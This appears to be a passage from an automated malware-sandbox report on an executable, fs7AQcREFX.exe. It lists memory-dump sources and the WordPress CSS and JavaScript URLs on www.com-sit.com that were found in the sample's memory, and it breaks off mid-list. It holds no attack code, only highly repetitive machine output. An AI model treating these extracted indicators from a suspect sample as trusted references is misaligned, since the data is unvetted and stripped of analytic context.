                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-2274.css?ver=1685016036
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-42.css?ver=1685016036
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-46.css?ver=1685016036
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-6.css?ver=1685016035
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-638.css?ver=1685016036
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/premium-addons-elementor/pa-frontend-2947ecb72.min.css?ver
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/css/classic-themes.min.css?ver=6.2.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, 